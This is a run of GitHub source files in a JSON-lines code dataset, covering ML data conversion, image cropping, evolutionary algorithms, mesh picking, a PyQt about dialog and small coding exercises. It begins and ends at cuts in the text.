_process_dataset_from_struct(name, pdDataFrameDir, num_shards):\n \"\"\"Process a complete data set and save it as a TFRecord.\n\n Args:\n name: string, unique identifier specifying the data set.\n pdDataFrameDir: string, path of the pandas DataFrame struct generated by the YCB_database generator\n num_shards: integer number of shards for this data set.\n \"\"\"\n object_distance = float(FLAGS.object_distance)\n filenames, texts, labels, occ_texts, occ_labels, occ_percs = _find_image_files_in_struct(\n pdDataFrameDir, object_distance)\n _process_image_files(name + str(FLAGS.object_distance) + FLAGS.name_modifier,\n filenames, texts, labels, occ_texts, occ_labels, occ_percs, num_shards)\n\n\ndef main(unused_argv):\n assert not FLAGS.train_shards % FLAGS.num_threads, (\n 'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')\n assert not FLAGS.validation_shards % FLAGS.num_threads, (\n 'Please make the FLAGS.num_threads commensurate with '\n 'FLAGS.validation_shards')\n print('Saving results to %s' % FLAGS.output_directory)\n\n # Run it!\n _process_dataset_from_struct('validation', FLAGS.pdstruct_file,\n FLAGS.validation_shards)\n _process_dataset_from_struct('train', FLAGS.pdstruct_file,\n FLAGS.train_shards)\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"mrernst/CAR_flow","sub_path":"datasets/osycb/osycb_to_tfrecord.py","file_name":"osycb_to_tfrecord.py","file_ext":"py","file_size_in_byte":28973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30245643379","text":"import torch\nimport torch.nn as nn\nfrom ika import IKA, distance_matrix\n\n\nclass RBFModel(nn.Module):\n def __init__(self, filters, sigma):\n super().__init__()\n\n self.filters = nn.Parameter(filters)\n self.sigma = sigma\n\n def forward(self, x):\n return torch.exp(-distance_matrix(x, self.filters, 
squared=True) / (2 * self.sigma ** 2))\n\n\ndef main():\n X = torch.randn((1000, 32))\n\n D = distance_matrix(X, X)\n\n sigma, _ = torch.kthvalue(D.view(-1), int(0.1 * D.size(0) ** 2), dim=-1)\n sigma = sigma.item()\n\n filters = torch.randn((64, 32))\n b = RBFModel(filters, sigma)\n\n ika = IKA(b)\n\n G = torch.exp(-0.5 * (D / sigma) ** 2)\n ika.compute_linear_layer(X, G)\n\n with torch.no_grad():\n y = ika(X)\n G_ = y @ y.t()\n\n # error = torch.norm(G - G_) / torch.norm(G)\n # print(error.item())\n loss = torch.mean((G - G_) ** 2)\n print(loss.item())\n\n optimizer = torch.optim.Adam(b.parameters(), lr=1e-2)\n\n for i in range(50):\n X = torch.randn((3000, 32))\n G = torch.exp(-0.5 * (distance_matrix(X, X) / sigma) ** 2)\n\n y = ika(X)\n G_ = y @ y.t()\n\n loss = torch.mean((G - G_) ** 2)\n print(loss.item())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n ika.compute_linear_layer(X, G)\n\n\nmain()\n","repo_name":"matteo-ronchetti/IKA","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"17896135905","text":"from _typeshed import Incomplete\nfrom typing_extensions import Literal, TypeAlias\n\nimport _win32typing\n\ndef odbc(connectionString: str) -> _win32typing.connection: ...\ndef SQLDataSources(direction) -> tuple[Incomplete, Incomplete]: ...\n\n_odbcError: TypeAlias = type # noqa: Y042 # Does not exist at runtime, but odbc.odbcError is a valid type.\nDATE: str\nNUMBER: str\nRAW: str\nSQL_FETCH_ABSOLUTE: int\nSQL_FETCH_FIRST: int\nSQL_FETCH_FIRST_SYSTEM: int\nSQL_FETCH_FIRST_USER: int\nSQL_FETCH_LAST: int\nSQL_FETCH_NEXT: int\nSQL_FETCH_PRIOR: int\nSQL_FETCH_RELATIVE: int\nSTRING: str\nTYPES: tuple[Literal[\"STRING\"], Literal[\"RAW\"], Literal[\"NUMBER\"], Literal[\"DATE\"]]\ndataError: Incomplete\nerror: _odbcError\nintegrityError: Incomplete\ninternalError: Incomplete\nnoError: Incomplete\nopError: Incomplete\nprogError: Incomplete\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/typeshed/stubs/pywin32/win32/odbc.pyi","file_name":"odbc.pyi","file_ext":"pyi","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"6018543119","text":"from dataclasses import dataclass\nfrom typing import Type\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport numpy as np\n\nfrom . import BaseAnomaly\nfrom .. 
import AnomalyProtocol\nfrom ...utils.types import BaseOscillationKind\n\n\n@dataclass\nclass AnomalyPatternParameters:\n sinusoid_k: float = 10.0\n cbf_pattern_factor: float = 2.0\n\n\nclass AnomalyPattern(BaseAnomaly):\n def generate(self, anomaly_protocol: AnomalyProtocol) -> AnomalyProtocol:\n if anomaly_protocol.base_oscillation_kind == BaseOscillationKind.Sine:\n def sinusoid(t: np.ndarray, k: float, amplitude: float) -> np.ndarray:\n pattern = (np.arctan(k * t) / np.arctan(k))\n scaled = MinMaxScaler(feature_range=(-amplitude, amplitude)).fit_transform(pattern.reshape(-1, 1)).reshape(-1)\n return scaled\n\n sine = anomaly_protocol.base_oscillation\n subsequence = sinusoid(sine.timeseries[anomaly_protocol.start:anomaly_protocol.end], self.sinusoid_k, sine.amplitude)\n anomaly_protocol.subsequences.append(subsequence)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.RandomWalk:\n self.logger.warn_false_combination(self.__class__.__name__, anomaly_protocol.base_oscillation_kind.name)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.CylinderBellFunnel:\n cbf = anomaly_protocol.base_oscillation\n subsequence = cbf.generate_only_base(variance_pattern_length=cbf.variance_pattern_length * self.cbf_pattern_factor)[anomaly_protocol.start:anomaly_protocol.end]\n anomaly_protocol.subsequences.append(subsequence)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.ECG:\n ecg = anomaly_protocol.base_oscillation\n length = anomaly_protocol.end - anomaly_protocol.start\n window = int(length * 0.05)\n\n for slide in range(-3, 3):\n start = ecg.timeseries[anomaly_protocol.start+slide:anomaly_protocol.start+window]\n if np.argmax(start) == 0:\n break\n else:\n slide = 0\n\n subsequence = ecg.timeseries[anomaly_protocol.start + slide:anomaly_protocol.end + slide][::-1]\n anomaly_protocol.subsequences.append(subsequence)\n else:\n self.logger.warn_false_combination(self.__class__.__name__, anomaly_protocol.base_oscillation_kind.name)\n return anomaly_protocol\n\n @staticmethod\n def get_parameter_class() -> Type[AnomalyPatternParameters]:\n return AnomalyPatternParameters\n\n def __init__(self, parameters: AnomalyPatternParameters):\n super().__init__()\n self.sinusoid_k = parameters.sinusoid_k\n self.cbf_pattern_factor = parameters.cbf_pattern_factor\n","repo_name":"ramonmassip/gutentag","sub_path":"gutenTAG/anomalies/types/pattern.py","file_name":"pattern.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"9407660595","text":"from wand.image import Image as wi\nfrom PIL import ImageOps\nfrom PIL import Image\nimport os\nimport pip\nimport sys\n\ndef pdf2jpg(filename,source):\n\n pdf = wi(filename=source+'\\\\'+filename+'.pdf', resolution=300)\n pdfImg = pdf.convert('jpeg')\n i=1\n name=str(filename).split('.')[0]\n\n for img in pdfImg.sequence:\n page = wi(image=img)\n page.save(filename=source+'\\\\'+name+'--'+str(i)+'.jpg')\n i+=1\n\ndef cropImg(fileName,filetype,source, dest):\n\n if filetype == 'jpg':\n img = Image.open(source+'\\\\'+fileName+'.'+filetype)\n # elif filetype == 'pdf':\n # img = Image.open('wholeImg/'+fileName+'.jpg')\n else:\n return\n\n xdimSize = img.size[0]\n ydimSize = img.size[1]\n\n xStartTL = -1\n xStartBL = -1\n xStartMid = -1\n yStartTop = 0\n xEndTR = xdimSize\n xEndBR = xdimSize\n xEndMid = xdimSize\n yEndL = ydimSize\n yEndM = ydimSize\n yEndR = ydimSize\n\n\n y=0\n tol01=0\n while y <= ydimSize and yEndM == ydimSize:\n 
r,g,b = img.getpixel((int(xdimSize/2),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndM = y-50\n y+=1\n y=0\n tol01=0\n while y <= ydimSize and yEndL == ydimSize:\n r,g,b = img.getpixel((int(xdimSize/4),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndL = y-50\n y+=1\n y=0\n tol01=0\n while y <= ydimSize and yEndR == ydimSize:\n r,g,b = img.getpixel((int(3*xdimSize/4),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndR = y-50\n y+=1\n\n yEnd=max(yEndL,yEndR,yEndM)\n\n\n x=0\n tol1 = 0\n while x < xdimSize and xEndTR == xdimSize:\n r,g,b = img.getpixel((x,0))\n if(xStartTL ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartTL = x\n if(xStartTL != -1 and r >= 254 and g >= 254 and b>= 254):\n tol1+=1\n if(tol1 == 50):\n xEndTR = x-50\n x+=1\n\n x = 0\n tol2 = 0\n while x < xdimSize and xEndBR == xdimSize:\n r,g,b = img.getpixel((x,yEnd-70))\n if(xStartBL ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartBL = x\n if(xStartTL != -1 and r >= 254 and g >= 254 and b>= 254):\n tol2+=1\n if(tol2 == 50):\n xEndBR = x-50\n \n x+=1\n x = 0\n tol3 = 0\n while x < xdimSize and xEndMid == xdimSize:\n r,g,b = img.getpixel((x,int(yEnd/2)))\n if(xStartMid ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartMid = x\n if(xStartMid != -1 and r >= 254 and g >= 254 and b>= 254):\n tol3+=1\n if(tol3 == 50):\n xEndMid = x-50\n \n x+=1\n\n xStart = min(xStartBL,xStartTL, xStartMid)\n xEnd = max(xEndBR,xEndTR,xEndMid)\n\n area=(xStart,yStartTop,xEnd,yEnd)\n croppedImg = img.crop(area)\n croppedImg.save(dest+'\\\\'+fileName+'.jpg')\n\n# def install(package):\n# if hasattr(pip, 'main'):\n# pip.main(['install', package])\n# else:\n# pip.main(['install', package]) \n\ndef main():\n\n # only need to run once to generate the directory of jpg files\n # pdf2jpg('keith.pdf')\n print(\"USAGE:\\n python cropImg.py C:\\\\path\\\\souceDirectory C:\\\\path\\\\destinationDirectory\\nDo not include \\\\ after source/destination \")\n\n source = sys.argv[1]\n dest = sys.argv[2]\n\n print(source,dest)\n\n for fn in os.listdir(source):\n filename = str(fn).split('.')[0]\n filetype = str(fn).split('.')[1]\n name = filename.split('\\\\')[-1]\n if filetype=='pdf':\n pdf2jpg(name,source)\n\n for fn in os.listdir(source):\n filename = str(fn).split('.')[0]\n filetype = str(fn).split('.')[1]\n name = filename.split('\\\\')[-1]\n if filetype=='jpg':\n cropImg(name,filetype,source,dest)\n \n # for fn in os.listdir('wholeImg'):\n # filename = str(fn).split('.')[0]\n # # filetype = str(fn).split('.')[1]\n # cropImg(filename,'pdf')\n\n\n # cropImg('keith--6','pdf')\n\n\n\n\nif __name__ == \"__main__\":\n # install('argh')\n main()\n\n\n","repo_name":"kkamons/CropImageInPDF","sub_path":"cropImg.py","file_name":"cropImg.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72376022290","text":"from sys import argv\nfrom os.path import exists # exists command returns True if a file exists, based on name in string as argument\n\nscript, from_file, to_file = argv \n\nprint(f\"Copying from {from_file} to {to_file}\")\n\nin_file = open(from_file)\nindata = in_file.read()\n\n#len () function gets length of string and returns as a number \nprint(f\"The input file is {len(indata)} bytes long\")\n\n# will return as true or false (in this case false, to_file is created in terminal)\nprint(f\"Does the output file exist? 
{exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint(\"Alright, all done.\")\n\n# good practice to use close() method to close all files \nout_file.close()\nin_file.close() ","repo_name":"eunice-pereira/Python-practice","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3539266889","text":"import requests\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom datetime import datetime\nimport os\n\ncurrent_datetime = datetime.now()\nversion = requests.get('https://pastebin.com/raw/YDyNZ5Py').text\nyear = current_datetime.year\n\n\nclass AboutDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super(AboutDialog, self).__init__(*args, **kwargs)\n\n QBtn = QDialogButtonBox.Ok\n self.buttonbox = QDialogButtonBox(QBtn)\n self.buttonbox.accepted.connect(self.accept)\n self.buttonbox.rejected.connect(self.reject)\n self.setWindowFlags(Qt.FramelessWindowHint)\n\n layout = QVBoxLayout()\n\n title = QLabel(\"SolenoxBrowser\")\n font = title.font()\n font.setPointSize(20)\n title.setFont(QFont('Segoe UI', 20))\n font.setBold(True)\n\n layout.addWidget(title)\n\n logo = QLabel()\n logo.setPixmap(QPixmap(os.path.join('data/images', 'logo.png')))\n layout.addWidget(logo)\n\n layout.addWidget(QLabel(f\"Version {version}\"))\n layout.addWidget(QLabel(f\"Copyright {year} SolenoxProject\"))\n\n for i in range(0, layout.count()):\n layout.itemAt(i).setAlignment(Qt.AlignHCenter)\n\n layout.addWidget(self.buttonbox)\n\n self.setLayout(layout)\n","repo_name":"lolkekdev/SolenoxBrowser","sub_path":"src/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"11994335080","text":"import sys, pprint\ninput = sys.stdin.readline\n\n\ndef tornado(r, c, direction):\n global sand_out\n dr, dc = move_direction[direction] # 진행방향\n dr2, dc2 = move_direction[(direction+1)%4] # 진행방향의 왼쪽\n dr3, dc3 = move_direction[(direction+3)%4] # 진행방향의 오른쪽\n spread_sand_list = [\n (r+dr2, c+dc2, 0.07), (r+dr+dr2, c+dc+dc2, 0.1), (r-dr+dr2, c-dc+dc2, 0.01), (r+2*dr2, c+2*dc2, 0.02),\n (r+dr3, c+dc3, 0.07), (r+dr+dr3, c+dc+dc3, 0.1), (r-dr+dr3, c-dc+dc3, 0.01), (r+2*dr3, c+2*dc3, 0.02),\n (r+2*dr, c+2*dc, 0.05)\n ] # 흩날리는 지역과 비율\n \n # 흩날릴 모래양 \n now_sand = sands[r][c]\n alpha_sand = sands[r][c]\n sands[r][c] = 0\n \n # 비율이 적힌 칸에 대한 계산\n for tr, tc, ratio in spread_sand_list:\n alpha_sand -= int(now_sand * ratio)\n if 0 <= tr < N and 0 <= tc < N:\n sands[tr][tc] += int(now_sand * ratio)\n else:\n sand_out += int(now_sand * ratio)\n \n # alpha칸에 대한 계산\n if 0 <= r+dr < N and 0 <= c+dc < N:\n sands[r+dr][c+dc] += alpha_sand\n else:\n sand_out += alpha_sand\n\nN = int(input())\nsands = [list(map(int, input().split())) for _ in range(N)]\nstart = (N//2, N//2)\nr, c = start\nmove_direction = [(0, -1), (1, 0), (0, 1), (-1, 0)] # 좌우하상\nmove_distance = 1 # 움직이는 거리, 방향전환 2번마다 한칸씩 더 움직임\nmove_flag = True\nnow_move_direction = 0\nsand_out = 0\ncnt = 1\nwhile cnt < N**2-1:\n for i in range(move_distance):\n cnt += 1\n dr, dc = move_direction[now_move_direction]\n r += dr\n c += dc\n if not(0 <= r < N and 0 <= c < N):\n continue\n tornado(r, c, now_move_direction)\n # 두번의 방향전환 후에 이동거리가 하나씩 증가 \n if move_flag:\n move_flag = False\n else:\n 
move_distance += 1\n move_flag = True\n now_move_direction = (now_move_direction + 1)%4\n \nprint(sand_out)","repo_name":"okdongdong/Algorithm_Study","sub_path":"Python/BOJ/4_Gold/20057.py","file_name":"20057.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21660486932","text":"#User function Template for python3\n\nclass Solution:\n def nextPermutation(self, N, arr):\n # code here\n if N<=2:\n arr[0],arr[1] = arr[1],arr[0]\n return arr\n \n pointer = N-2\n while pointer>=0 and arr[pointer+1]<=arr[pointer]:\n pointer-=1\n \n if pointer == -1:\n return arr[::-1]\n \n \n for x in range(N-1,pointer,-1):\n if arr[x]>arr[pointer]:\n arr[x],arr[pointer]=arr[pointer],arr[x]\n break\n \n arr[pointer+1:]=reversed(arr[pointer+1:])\n return arr\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n N = int(input())\n arr = input().split()\n for i in range(N):\n arr[i] = int(arr[i])\n \n ob = Solution()\n ans = ob.nextPermutation(N, arr)\n for i in range(N):\n print(ans[i],end=\" \")\n print()\n# } Driver Code Ends","repo_name":"Priya1202/DSA","sub_path":"Next Permutation - GFG/next-permutation.py","file_name":"next-permutation.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16650165566","text":"from enum import Enum\nimport csv\n\ntimeelapsedneararena = 5.0\n\n\nclass SaveMode(Enum):\n FALSE = 0\n TIMELINE = 1\n STAT = 2\n STEADYSTAT = 3\n\n\nclass Item:\n # 4 digits\n acceleration: list\n # 4 digits\n correlation: list\n # 4 digits\n distancebetweenunits: list\n # 3 digits\n distancebetweenneighbors: list\n # 1 digits\n collisionratio: float\n # 8 digits\n velocity: list\n # 3 digits\n CoM: list\n\n def __init__(self, acceleration=[0.0 for i in range(4)],\n correlation=[0.0 for i in range(4)],\n distancebetweenunits=[0.0 for i in range(4)],\n distancebetweenneighbors=[0.0 for i in range(3)],\n collisionratio=0.0,\n velocity=[0.0 for i in range(8)],\n CoM=[0.0 for i in range(3)]):\n\n self.acceleration = acceleration\n self.correlation = correlation\n self.distancebetweenunits = distancebetweenunits\n self.distancebetweenneighbors = distancebetweenneighbors\n self.collisionratio = collisionratio\n self.velocity = velocity\n self.CoM = CoM\n pass\n\n def reset(self):\n self.acceleration = [0.0 for i in range(4)]\n self.correlation = [0.0 for i in range(4)]\n self.distancebetweenunits = [0.0 for i in range(4)]\n self.distancebetweenneighbors = [0.0 for i in range(3)]\n self.collisionratio = 0.0\n self.velocity = [0.0 for i in range(8)]\n self.CoM = [0.0 for i in range(3)]\n\n\nclass StatUtil:\n elapsedtime: float\n startofsteadystate: float\n savemode: SaveMode\n sum: Item\n stdev: Item\n\n def __init__(self, elpasedtime=0.0, startofsteadystate=0.0,\n savemode=SaveMode.FALSE, sum=Item(), stdev=Item()):\n self.elapsedtime = elpasedtime\n self.startofsteadystate = startofsteadystate\n self.savemode = savemode\n self.sum = sum\n self.stdev = stdev\n pass\n\n def reset(self):\n self.sum.reset()\n self.stdev.reset()\n pass\n\n def initmodelspecificstatus(self, currentdirectory: str):\n\n f_distancefromarena = open(currentdirectory+'/distance_from_arena.csv', 'w+')\n f_clusterdependentcorrelation = open(currentdirectory+'/cluster_dependent_correlation.csv', 'w+')\n f_clusterparameters = 
open(currentdirectory+'/cluster_parameters.csv', 'w+')\n\n # preparations\n title_distancefromarena = [\n 'time(s)',\n 'distance_from_arena_avg(cm)',\n 'distance_from_arena_stdev(cm)',\n 'distance_from_arena_min(cm)',\n 'distance_from_arena_max(cm)',\n 'number_of_agents_outside']\n title_clusterdependentcorrelation = [\n 'time(s)',\n 'cluster_dependent_correlation_avg',\n 'cluster_dependent_correlation_stdev',\n 'cluster_dependent_correlation_min',\n 'cluster_dependent_correlation_max']\n title_clusterparameters = [\n 'time_(s)',\n 'min_cluster_size',\n 'max_cluster_size',\n 'agents_not_in_cluster']\n\n if self.savemode is SaveMode.STAT or self.savemode is not SaveMode.STEADYSTAT:\n csvwriter_distancefromarena = csv.writer(\n f_distancefromarena)\n csvwriter_distancefromarena.writerow(\n title_distancefromarena)\n\n csvwriter_clusterdependentcorrelation = csv.writer(\n f_clusterdependentcorrelation)\n csvwriter_clusterdependentcorrelation.writerow(\n title_clusterdependentcorrelation)\n csvwriter_clusterparameters = csv.writer(\n f_clusterparameters)\n csvwriter_clusterparameters.writerow(\n title_clusterparameters)\n\n if self.savemode is SaveMode.STAT or self.savemode is SaveMode.STEADYSTAT:\n f_distancefromarena_stdev = open(currentdirectory+'/distance_from_arena_stdev.csv', 'w+')\n f_clusterdependentcorrelation_stdev = open(currentdirectory+'/cluster_dependent_correlation_stdev.csv', 'w+')\n f_clusterparameters_stdev = open(currentdirectory+'/cluster_parameters_stdev.csv', 'w+')\n\n # preparations\n title_distancefromarena_stdev = [\n 'time_elapsed_near_arena_(s)',\n 'distance_from_arena_avg_(cm)',\n 'distance_from_arena_stdev_(cm)',\n 'distance_from_arena_min_(cm)',\n 'distance_from_arena_max_(cm)',\n 'number_of_agents_outside']\n title_clusterdependentcorrelation_stdev = [\n 'time_(s)',\n 'cluster_dependent_correlation_avg',\n 'cluster_dependent_correlation_stdev',\n 'cluster_dependent_correlation_min',\n 'cluster_dependent_correlation_max']\n title_clusterparameters_stdev = [\n 'time_(s)', 'min_cluster_size',\n 'max_cluster_size',\n 'agents_not_in_cluster']\n\n csvwriter_distancefromarena_stdev = csv.writer(\n f_distancefromarena_stdev)\n csvwriter_distancefromarena_stdev.writerow(\n title_distancefromarena_stdev)\n\n csvwriter_clusterdependentcorrelation_stdev = csv.writer(\n f_clusterdependentcorrelation_stdev)\n csvwriter_clusterdependentcorrelation_stdev.writerow(\n title_clusterdependentcorrelation_stdev)\n\n csvwriter_clusterparameters_stdev = csv.writer(\n f_clusterparameters_stdev)\n csvwriter_clusterparameters_stdev.writerow(\n title_clusterparameters_stdev)\n\n # TODO: how to deal with the global variable 'TimeElapsedNearArena'? 
This is a question\n\n global timeelapsedneararena\n timeelapsedneararena = 0.0\n\n","repo_name":"htlee6/flockrobots","sub_path":"utils/StatsticUtils/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21230942349","text":"import warnings\n\nimport numpy as np\nimport pyvista as pv\nimport vtk\n\nfrom pyvista import PolyData, UnstructuredGrid\nfrom typing import List\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal\n\nfrom .reconstruct_mesh import merge_mesh\n\n\ndef three_d_pick(\n mesh: PolyData or UnstructuredGrid,\n key: str = \"groups\",\n pick_method: Literal[\"rectangle\", \"box\"] = \"rectangle\",\n invert: bool = False,\n merge: bool = True,\n) -> List[PolyData or UnstructuredGrid] or UnstructuredGrid:\n \"\"\"\n Pick the interested part of a reconstructed 3D mesh by interactive approach.\n Args:\n mesh: Reconstructed 3D mesh.\n key: The key under which are the labels.\n pick_method: Pick the interested part of a mesh using a 2D rectangle widget or 3D box widget. Available `pick_method` are:\n * `'rectangle'`: Pick the interested part of a mesh using a 2D rectangle widget. Multiple meshes can be generated at the same time.\n * `'box'`: Pick the interested part of a mesh using a 3D box widget. Only one mesh can be generated.\n invert: Flag on whether to flip/invert the pick.\n merge: Flag on whether to merge all picked meshes.\n Returns:\n A list of meshes or a merged mesh. If merge is True, return a merged mesh; else return a list of meshes.\n \"\"\"\n\n if isinstance(mesh, UnstructuredGrid) is False:\n warnings.warn(\"The mesh should be a pyvista.UnstructuredGrid object.\")\n mesh = mesh.cast_to_unstructured_grid()\n\n p = pv.Plotter()\n\n if pick_method == \"rectangle\":\n # Clip a mesh using a 2D rectangle widget.\n p.add_mesh(mesh, scalars=f\"{key}_rgba\", rgba=True)\n picked_meshes, invert_meshes, legend = [], [], []\n\n def split_mesh(original_mesh):\n \"\"\"Adds a new mesh to the plotter each time cells are picked, and\n removes them from the original mesh\"\"\"\n\n # if nothing selected\n if not original_mesh.n_cells:\n return\n\n # remove the picked cells from main grid\n ghost_cells = np.zeros(mesh.n_cells, np.uint8)\n ghost_cells[original_mesh[\"orig_extract_id\"]] = 1\n mesh.cell_data[vtk.vtkDataSetAttributes.GhostArrayName()] = ghost_cells\n mesh.RemoveGhostCells()\n\n # add the selected mesh this to the main plotter\n color = np.random.random(3)\n legend.append([\"picked mesh %d\" % len(picked_meshes), color])\n p.add_mesh(original_mesh, color=color)\n p.add_legend(legend)\n\n # track the picked meshes and label them\n original_mesh[\"picked_index\"] = np.ones(original_mesh.n_points) * len(\n picked_meshes\n )\n picked_meshes.append(original_mesh)\n invert_meshes.append(mesh)\n\n p.enable_cell_picking(\n mesh=mesh,\n callback=split_mesh,\n show=False,\n font_size=12,\n show_message=\"Press `r` to enable retangle based selection. Press `r` again to turn it off. \\n\"\n \"Press `q` to exit the interactive window. 
\",\n )\n p.show()\n picked_meshes = [invert_meshes[0]] if invert else picked_meshes\n else:\n # Clip a mesh using a 3D box widget.\n p.add_mesh_clip_box(mesh, invert=invert, scalars=f\"{key}_rgba\", rgba=True)\n p.show()\n picked_meshes = p.box_clipped_meshes\n\n # plot final picked meshes\n pv.plot(picked_meshes)\n\n if merge:\n return merge_mesh(picked_meshes) if len(picked_meshes) > 1 else picked_meshes[0]\n else:\n return picked_meshes\n","repo_name":"chen-zhan/stDrosophila-release-1","sub_path":"stDrosophila/tools/three_d_reconstruction/picking.py","file_name":"picking.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6002656050","text":"from benchmark_functions import benchmark_functions\nfrom EvolutionaryAlgorithm import *\n\nimport matplotlib.pyplot as plt\n\nfor function in benchmark_functions:\n EA = EvolutionaryAlgorithm(benchmark_functions[function], 1000, 1000, 30)\n\n plt.figure()\n plt.title(function)\n\n adaptiveES = AdaptiveEvolutionStrategies(EA)\n history = adaptiveES.run(1000, 10)\n print('Adaptive ES (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'r-', label='Adaptive ES')\n\n selfAdaptiveES = SelfAdaptiveEvolutionStrategies(EA)\n history = selfAdaptiveES.run(1000, 10)\n print('Self-Adaptive ES (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'g-', label='Self-adaptive ES')\n\n DE = DifferentialEvolution(EA)\n history = DE.run(1000, 10)\n print('DE (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'b-', label='DE')\n\n pso = PSO(EA)\n history = pso.run(1000, 10)\n print('PSO (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'k-', label='PSO')\n\n print('-------------------------------')\n\n plt.legend()\n\nplt.show()","repo_name":"mohamad-qodosi/Evoluationary_computing","sub_path":"test_algirithms.py","file_name":"test_algirithms.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28442818907","text":"import random\r\n\r\n\r\ndef create_code(c_letters, length):\r\n '''\r\n (str, int)---> list\r\n Given a str and a size (an int) return a list of length size of single\r\n character strs comprised of the characters in the given str.\r\n '''\r\n newlist = []\r\n for i in range(0, length):\r\n letter = random.choice(c_letters)\r\n newlist.append(letter)\r\n return newlist\r\n\r\n\r\ndef valid(code_list, valid_chars, length):\r\n '''\r\n (list, str, int) ---> bool\r\n Given a list of single character strs, a str and a int that\r\n is the length of the guess, return True if every character,\r\n is in the given str and the guess is the correct length.\r\n '''\r\n wordcode = ''\r\n for i in code_list:\r\n wordcode = wordcode + i\r\n if len(wordcode) > length:\r\n return False\r\n else:\r\n for i in code_list:\r\n if valid_chars.find(i) == -1:\r\n return False\r\n return True\r\n\r\n\r\ndef remove_fully_correct(code_list, guess_list):\r\n '''\r\n (list, list) ---> list\r\n Given two lists of single character strs return a new list that is the\r\n result of removing from the first list all chars that are the same and\r\n in the same position in the second list. 
Both lists have\r\n the same length.\r\n '''\r\n newlist = []\r\n index = 0\r\n while index < len(code_list) and index < len(guess_list):\r\n if code_list[index] == guess_list[index]:\r\n newlist.append(code_list[index])\r\n index = index + 1\r\n return newlist\r\n\r\n\r\ndef find_fully_correct(code_list, guess_list):\r\n '''\r\n (list, list) ---> list\r\n Given the answer code (a list) and the guess (a list) return a list\r\n containing a 'b' for each correctly positioned colour in the guess.\r\n '''\r\n newlist = []\r\n c_list = remove_fully_correct(code_list, guess_list)\r\n c_word = ''\r\n for i in code_list:\r\n c_word = c_word + i\r\n newlist = []\r\n for item in c_list:\r\n count = c_word.count(item)\r\n if count >= 1:\r\n newlist.append('b')\r\n return newlist\r\n\r\n\r\ndef find_colour_correct(clist, glist1):\r\n '''\r\n (list, list) ---> list\r\n Given two lists of single character strs return a list of 'w's\r\n where the number of 'w's is equal to the number of str in the\r\n second list that have the same value as str in the first list\r\n but different position. Only one 'w' is returned for each str in\r\n the first list.\r\n '''\r\n glist = []\r\n for s in glist1:\r\n glist.append(s)\r\n index = 0\r\n while index < len(clist) and index < len(glist):\r\n if clist[index] == glist[index]:\r\n clist = clist[:index] + clist[index+1:]\r\n glist = glist[:index] + glist[index+1:]\r\n index = -1\r\n index = index + 1\r\n g_word = ''\r\n for item in glist:\r\n g_word = g_word + item\r\n newlist = []\r\n for i in clist:\r\n count = g_word.count(i)\r\n if count >= 1:\r\n newlist.append('w')\r\n glist.remove(i)\r\n g_word = ''\r\n for let in glist:\r\n g_word = g_word + let\r\n return newlist\r\n\r\ndef print_game(glist1, clist2):\r\n '''\r\n (list, list) ---> None\r\n Given two lists of lists of single character strs print to the display\r\n the headers Guess and Clue separated by a tab. Next, print\r\n corresponding sublists of the given lists. Each character in the\r\n sublists should be 